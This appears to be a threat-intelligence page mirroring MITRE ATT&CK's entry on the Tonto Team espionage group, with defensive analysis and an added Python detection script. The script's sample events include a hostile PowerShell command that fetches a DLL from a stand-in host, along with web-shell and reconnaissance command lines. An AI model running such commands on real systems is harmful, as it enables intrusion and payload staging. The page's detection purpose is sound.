MITRE ATT&CK® Group

G0131: Tonto Team

Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).[1][2][3][4][5][6]

Enterprise · G0131 · Group · Object v1.1 · Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

Tonto Team matters as a long-running espionage-focused intrusion set with reported targeting across government, military, energy, mining, financial, education, healthcare, and technology sectors in South Korea, Japan, Taiwan, the United States, and later other Asian and Eastern European countries. For leaders, the practical takeaway is not a single indicator or tool, but a pattern: initial access through malicious files and exploitation, followed by credential theft, discovery, remote access tooling, web shells, and command-and-control behaviors that can support persistent access to sensitive environments.

Executive priority

Prioritize this as an espionage-readiness and resilience issue where the organization has sensitive government, defense, energy, mining, financial, healthcare, education, or technology data, or regional exposure matching the ATT&CK description. Executives should ask whether identity controls, vulnerability management, email/file defenses, web server monitoring, endpoint telemetry, and incident response playbooks can prove coverage for credential dumping, web shells, lateral movement via remote service exploitation, and command-and-control through proxies. The decision value is in validating control depth across the intrusion lifecycle, not in assuming the group is currently targeting the organization.

Technical view

ATT&CK does not provide a detection section for this group, so SOC and IR teams should map detections from the related techniques and software. Validate visibility for spearphishing attachments and malicious file execution, PowerShell and Python execution, privilege escalation exploitation, local group and network share discovery, credential dumping tools such as Mimikatz, gsecdump, and LaZagne, internal reconnaissance with tools such as NBTscan, RAT/backdoor activity associated with Bisonal and ShadowPad, web shell persistence, ingress tool transfer, external proxy use, and remote service exploitation. Because the group object itself has no specified platforms or tactics, platform assumptions should be derived only from the related technique and software objects and then confirmed against the local environment.

Likely telemetry

  • Email security and attachment detonation results for targeted malicious files
  • Endpoint process creation, command-line, script execution, and parent-child process telemetry for PowerShell, Python, DLL abuse, and tool execution
  • Credential access signals, including LSASS access, hash/secret dumping behavior, and stored password recovery tool activity
  • Windows event logs and EDR telemetry for local group enumeration, network share discovery, and lateral movement attempts
  • Network telemetry for SMB/share enumeration, remote service exploitation patterns, tool transfer, and unusual internal reconnaissance

Detection direction

  • Build behavior-based coverage around the related ATT&CK techniques rather than relying only on group or malware names.
  • Correlate suspicious attachment execution or client-side exploitation with subsequent script execution, credential dumping, discovery, and outbound command-and-control behavior.
  • Tune credential dumping detections to separate legitimate administrative or security testing activity from unexpected access to credential material, especially on Windows systems referenced by several related tools.
  • Review web server monitoring for unexpected script files, unusual child processes spawned by web services, and anomalous external access patterns consistent with web shell persistence.
  • Validate that network discovery detections cover both normal administrative tooling and open-source reconnaissance tools such as NBTscan, with allowlists for approved scanning activity.
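As an added illustration of the detection direction above (example code written for this page, not code from MITRE, Glexia or any vendor): a small Python rule set that applies behavior rules for web-server-spawned shells (T1505.003), PowerShell download primitives (T1105), non-allowlisted LSASS access (T1003) and share enumeration outside approved scanner hosts (T1135) to constructed Sysmon-style events, then correlates per host so that several techniques firing on one host inside a short window are escalated as a probable intrusion chain. The event schema, the allowlists, the hostnames and the sample command lines are all assumptions constructed for the example.

```python
"""Behavior-based detection for the Tonto Team-related techniques listed on this
page, run over constructed Sysmon-style events and correlated per host.

Added example for this page; the event schema, allowlists and sample events are
constructed for illustration and are not taken from the page, MITRE or a vendor."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# T1505.003: web server workers should rarely spawn an interactive shell or recon tool.
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "net.exe", "whoami.exe", "certutil.exe"}
# T1059.001 / T1105: PowerShell primitives used to pull additional payloads.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
# T1003: images allowed to open lsass.exe (assumption: tune to the local AV/EDR stack).
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
# T1135: share/host enumeration, with an allowlist of approved scanner hosts (assumption).
RECON_RE = re.compile(r"nbtscan|\bnet1?(\.exe)?\s+(view|share)\b", re.I)
APPROVED_SCANNERS = {"vuln-scan-01"}


def base(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def finding(event, technique, rule, detail):
    return {"host": event["host"], "ts": event["ts"], "technique": technique,
            "rule": rule, "detail": detail}


def detect(event):
    """Apply the per-event rules; return one finding or None."""
    if event["event"] == "process_create":
        image, parent = base(event["image"]), base(event.get("parent_image", ""))
        cmd = event.get("cmdline", "")
        if parent in WEB_SERVER_IMAGES and image in SUSPICIOUS_CHILDREN:
            return finding(event, "T1505.003", "web_server_spawned_shell", f"{parent} -> {image}")
        if image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_RE.search(cmd):
            return finding(event, "T1105", "powershell_download", cmd)
        if RECON_RE.search(cmd) and event["host"] not in APPROVED_SCANNERS:
            return finding(event, "T1135", "share_enumeration", cmd)
    elif event["event"] == "process_access":
        source = base(event["source_image"])
        if base(event["target_image"]) == "lsass.exe" and source not in LSASS_ALLOWLIST:
            return finding(event, "T1003", "lsass_access", source)
    return None


def correlate(events, window=timedelta(hours=1), min_techniques=2):
    """Return (findings, chains): chains maps a host to the sorted distinct
    technique IDs when >= min_techniques fire on it inside one window."""
    findings = [f for f in map(detect, events) if f]
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f)
    chains = {}
    for host, fs in by_host.items():
        fs.sort(key=lambda f: f["ts"])
        for i, first in enumerate(fs):
            techniques = sorted({f["technique"] for f in fs[i:] if f["ts"] - first["ts"] <= window})
            if len(techniques) >= min_techniques:
                chains[host] = techniques
                break
    return findings, chains


def t(s):
    return datetime.fromisoformat(s)


SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"event": "process_create", "host": "mail-01", "ts": t("2021-03-10T09:00:05"),
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"event": "process_create", "host": "mail-01", "ts": t("2021-03-10T09:02:41"),
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden (New-Object Net.WebClient).DownloadFile('http://192.0.2.10/a.dll','C:\\ProgramData\\a.dll')"},
    {"event": "process_access", "host": "mail-01", "ts": t("2021-03-10T09:15:12"),
     "source_image": r"C:\Windows\System32\rundll32.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event": "process_create", "host": "ws-12", "ts": t("2021-03-10T10:30:00"),
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\nbtscan.exe", "cmdline": "nbtscan.exe -r 10.20.0.0/24"},
    {"event": "process_create", "host": "vuln-scan-01", "ts": t("2021-03-10T10:31:00"),
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\nbtscan.exe", "cmdline": "nbtscan.exe -r 10.20.0.0/24"},
    {"event": "process_access", "host": "ws-07", "ts": t("2021-03-10T10:45:00"),
     "source_image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1400"},
]

if __name__ == "__main__":
    findings, chains = correlate(SAMPLE_EVENTS)
    for f in findings:
        print(f"{f['host']:<14}{f['technique']:<11}{f['rule']:<26}{f['detail']}")
    print("probable intrusion chains:", chains)
```

On the constructed sample, the Exchange-style host fires three different techniques within fifteen minutes and is escalated, the approved scanner and the Defender engine produce nothing, and the lone NBTscan run from an unapproved workstation stays a single finding for analyst review. The allowlists are where the tuning bullets above bite: the same rules with empty allowlists would flag every AV LSASS read and every sanctioned scan.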

Mitigation priorities

  • Start with exposure reduction for likely entry and escalation paths: patch client applications, internet-facing services, and remote services; prioritize vulnerabilities that enable execution or privilege escalation.
  • Strengthen email and file handling controls for malicious attachments, including user reporting workflows and safe execution analysis where available.
  • Reduce credential theft impact through least privilege, privileged access management, credential hygiene, and restrictions on where administrative credentials can be used.
  • Harden and monitor scripting environments such as PowerShell and Python according to business need, with logging enabled where feasible.
  • Limit lateral movement by reducing unnecessary shares and remote services, segmenting sensitive systems, and enforcing strong authentication for administrative access.

Analyst notes and limits

The strongest defensive value comes from the relationship set: Tonto Team is associated with credential dumping, keylogging, scripting, exploitation, discovery, tool transfer, web shells, proxy-based C2, and several public or named tools. These relationships support a coverage assessment across identity, endpoint, email, network, web server, vulnerability management, and IR processes. The official group description supports sector and regional relevance, but local risk should be based on the organization’s footprint, data sensitivity, and exposed attack surface.

The supplied ATT&CK group object has no official detection text, no group-level platforms, and no group-level tactics. The summary therefore uses the official description, aliases, external references, and relationship context only. It does not assert current activity, customer exposure, confirmed attribution beyond MITRE’s wording of suspected Chinese state sponsorship, or guaranteed detection coverage.

Official MITRE ATT&CK definition

Tonto Team

Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).[1][2][3][4][5][6]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

15 rows

Domain, ID, Name, Relationship / procedure

Enterprise T1135 Network Share Discovery

Tonto Team has used tools such as NBTscan to enumerate network shares. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1574.001 DLL (sub-technique)

Tonto Team abuses a legitimate and signed Microsoft executable to launch a malicious DLL. (Citation: ESET Exchange Mar 2021)

Enterprise T1090.002 External Proxy (sub-technique)

Tonto Team has routed their traffic through an external server in order to obfuscate their location. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1059.006 Python (sub-technique)

Tonto Team has used Python-based tools for execution. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1069.001 Local Groups (sub-technique)

Tonto Team has used the ShowLocalGroupDetails command to identify administrator, user, and guest accounts on a compromised host. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1056.001 Keylogging (sub-technique)

Tonto Team has used keylogging tools in their operations. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1003 OS Credential Dumping

Tonto Team has used a variety of credential dumping tools. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1505.003 Web Shell (sub-technique)

Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server. (Citation: ESET Exchange Mar 2021)

Enterprise T1203 Exploitation for Client Execution

Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489, CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads. (Citation: Kaspersky CactusPete Aug 2020) (Citation: TrendMicro Tonto Team October 2020) (Citation: Talos Bisonal Mar 2020) (Citation: Talos Bisonal 10 Years March 2020)

Enterprise T1204.002 Malicious File (sub-technique)

Tonto Team has relied on user interaction to open their malicious RTF documents. (Citation: TrendMicro Tonto Team October 2020) (Citation: Talos Bisonal Mar 2020)

Enterprise T1566.001 Spearphishing Attachment (sub-technique)

Tonto Team has delivered payloads via spearphishing attachments. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1210 Exploitation of Remote Services

Tonto Team has used EternalBlue exploits for lateral movement. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1059.001 PowerShell (sub-technique)

Tonto Team has used PowerShell to download additional payloads. (Citation: ESET Exchange Mar 2021)

Enterprise T1068 Exploitation for Privilege Escalation

Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges. (Citation: TrendMicro Tonto Team October 2020)

Enterprise T1105 Ingress Tool Transfer

Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader. (Citation: ESET Exchange Mar 2021)

Associated objects

Groups, software, and campaigns

Tool Enterprise

S0002: Mimikatz

Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [1] [2]

Windows
Malware Enterprise

S0268: Bisonal

Bisonal is a remote access tool (RAT) that has been used by Tonto Team against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.[1][2]

Windows
Malware Enterprise

S0596: ShadowPad

ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups. [1][2][3]

Windows
Tool Enterprise

S0349: LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[1]

Linux, macOS, Windows
Tool Enterprise

S0008: gsecdump

gsecdump is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. [1]

Windows
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.1
Created:
Modified:
Raw hash: ceb4d4e9ea661775...

Imported snapshots across ATT&CK releases (1)

Release: 19.1 | Bundle imported: | Object version: 1.1 | Modified: | Status: Current bundle | Raw hash: ceb4d4e9ea66…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] Kaspersky CactusPete Aug 2020
     Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.
  2. [2] ESET Exchange Mar 2021
     Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.
  3. [3] FireEye Chinese Espionage October 2019
     Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved November 17, 2024.
  4. [4] ARS Technica China Hack SK April 2017
     Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.
  5. [5] Trend Micro HeartBeat Campaign January 2013
     Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.
  6. [6] Talos Bisonal 10 Years March 2020
     Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.
  7. [7] BRONZE HUNTLEY
     (Citation: Secureworks BRONZE HUNTLEY)
  8. [8] CactusPete
     (Citation: Kaspersky CactusPete Aug 2020)
  9. [9] CrowdStrike Manufacturing Threat July 2020
     Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.
  10. [10] Earth Akhlut
     (Citation: TrendMicro Tonto Team October 2020)
  11. [11] Karma Panda
     (Citation: Kaspersky CactusPete Aug 2020) (Citation: CrowdStrike Manufacturing Threat July 2020)
  12. [12] Secureworks BRONZE HUNTLEY
     Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.
  13. [13] Talos Bisonal Mar 2020
     Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.
  14. [14] Tonto Team
     (Citation: Talos Bisonal Mar 2020)
  15. [15] TrendMicro Tonto Team October 2020
     Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.
  16. [16] mitre-attack G0131

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.